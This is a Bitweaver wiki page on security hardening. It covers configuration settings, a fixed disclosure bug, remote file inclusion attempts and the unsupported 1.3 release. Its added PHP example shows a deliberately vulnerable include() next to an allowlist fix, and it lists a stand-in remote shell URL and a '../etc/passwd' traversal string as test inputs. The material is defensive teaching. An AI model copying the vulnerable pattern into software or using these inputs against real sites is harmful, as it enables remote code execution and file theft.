History of Security

{maketoc}
! Bitweaver 2
!! Security settings
After you have installed bitweaver, check the following settings:
* In /kernel/config_inc.php the parameter IS_LIVE should be "true" (it is "true" by default). With IS_LIVE set, error messages are no longer exposed to visitors. To see the errors yourself, either monitor your error logs directly on the server, or set IS_LIVE to "false" only while testing and developing (and only while you have other protection in place, e.g. the site is not reachable by the public), then set it back to "true".
* Rename your /install/ directory. Rename it back only while installing new packages, and rename it again afterwards.
* In Admin > Users > Permissions, make sure that ''Anonymous'' is not allowed to attach files to content (not allowed by default).
* If users are allowed to input HTML, enable HTMLPurifier, which strips scripts and other dangerous markup from submitted HTML.
* If ''Anonymous'' can submit content, enable CAPTCHA (whether this is available depends on your server's setup).

!! Security issues
!!! wiki_url_import
The "suck_url Information Disclosure" security issue has been fixed in version 2.1. Before that, it could be exploited only if the admin had turned on the ''wiki_url_import'' feature (off by default).

!!! Hacking attempts
The script-kiddie plague du jour is to look for code of the form include($varWithSomeUrlFromGetString); and feed it a URL, so that PHP fetches and executes remotely hosted PHP code (remote file inclusion). If such an attack is attempted against a bitweaver install, you, the admin, may receive an error mail reporting something like "unknown column" or "unknown sort order" (normal users browsing your pages will never see an error message unless you set IS_LIVE to ''false'' in /kernel/config_inc.php). The error mail tells you that the attempted hack failed, i.e. that it didn't do anything.
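To make the pattern concrete, here is an added example (not bitweaver code) of the request-controlled include that these attacks probe for, next to a hardened form that maps the request onto a fixed allowlist, plus a small report of the php.ini settings that decide whether such an include can fetch remote code at all. The page names, the base directory and the settings report are assumptions for illustration; the sample inputs in the CLI section are constructed.

```php
<?php
// Added example, not part of bitweaver. Shows the include() pattern the
// "hacking attempts" above target and a hardened replacement.

// VULNERABLE (do not use): the request decides what gets included.
// With allow_url_include=On, ?page=http://attacker.example/shell.txt
// makes PHP fetch and execute that file. Even with it Off, "../" lets
// the caller include arbitrary local files.
function load_page_vulnerable(array $get): void
{
    include($get['page'] . '.php');
}

// HARDENED: map the request parameter onto a fixed allowlist and return
// the path to include, or null for anything not on the list. No bytes
// supplied by the client ever reach include().
function resolve_page(?string $requested, string $baseDir): ?string
{
    // Hypothetical page table; a real site would list its own files.
    $allowed = [
        'home'    => 'home.php',
        'contact' => 'contact.php',
    ];
    if ($requested === null || $requested === '') {
        $requested = 'home';
    }
    if (!isset($allowed[$requested])) {
        return null; // unknown key: URLs, "../", anything else is refused
    }
    return $baseDir . '/' . $allowed[$requested];
}

// Calling code: refuse with 404 instead of including something unexpected.
function load_page_hardened(array $get, string $baseDir): void
{
    $path = resolve_page(isset($get['page']) ? $get['page'] : null, $baseDir);
    if ($path === null) {
        http_response_code(404);
        exit('No such page');
    }
    include $path;
}

// One-off check for a site owner: the interpreter settings that turn a
// request-controlled include into remote code execution. allow_url_include
// exists since PHP 5.2.0 and defaults to Off; on older PHP, allow_url_fopen
// alone governed include() of URLs.
function report_include_settings(): array
{
    return [
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
        'open_basedir'      => ini_get('open_basedir') !== '' ? ini_get('open_basedir') : '(unset)',
    ];
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: a legitimate request and two attack attempts.
    $base = '/var/www/site/pages';
    var_dump(resolve_page('home', $base));                                // string(31) "/var/www/site/pages/home.php"
    var_dump(resolve_page('http://attacker.example/shell.txt', $base));   // NULL
    var_dump(resolve_page('../../../etc/passwd', $base));                 // NULL
    print_r(report_include_settings());
}
```

Run it with `php rfi_example.php` (assumed filename) to see the resolver refuse both attack inputs and to print the interpreter settings. The point of the hardened form is that the client chooses only a key into a table the code owns; whether a requested string "looks like" a URL is never checked, because it never needs to be.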

!! 3rd party applications
!!! PHP security settings
* For security reasons, your server might run PHP with features like open_basedir or safe_mode switched ON. See ((Install under safe mode)). Note that safe_mode was deprecated in PHP 5.3 and removed in PHP 5.4; open_basedir is still available and restricts which directories PHP scripts may open files from.

! Bitweaver 1.3
Bitweaver versions 1.3 and earlier were released in 2004/2005 (see ((bitweaverRoadMap|Roadmap))). These versions are no longer supported, i.e., the code has not been updated since release. They have a number of serious security issues. Some stem from 3rd-party code, such as left-over code from older versions or the infamous Xmlrpc bug (if that feature is enabled). Many of the improvements introduced with bitweaver 2 addressed these issues specifically. In other words, do not install version 1.3 anymore. If you are running version 1.3 and are concerned about security, please ((bitweaver R1 to R2 Upgrade|upgrade bitweaver)).
Page History
* Version 6 (current), 13 Feb 2010 (19:57 UTC), laetzer: added alias
* Version 5, Benjamin Couhe
* Versions 1-4, laetzer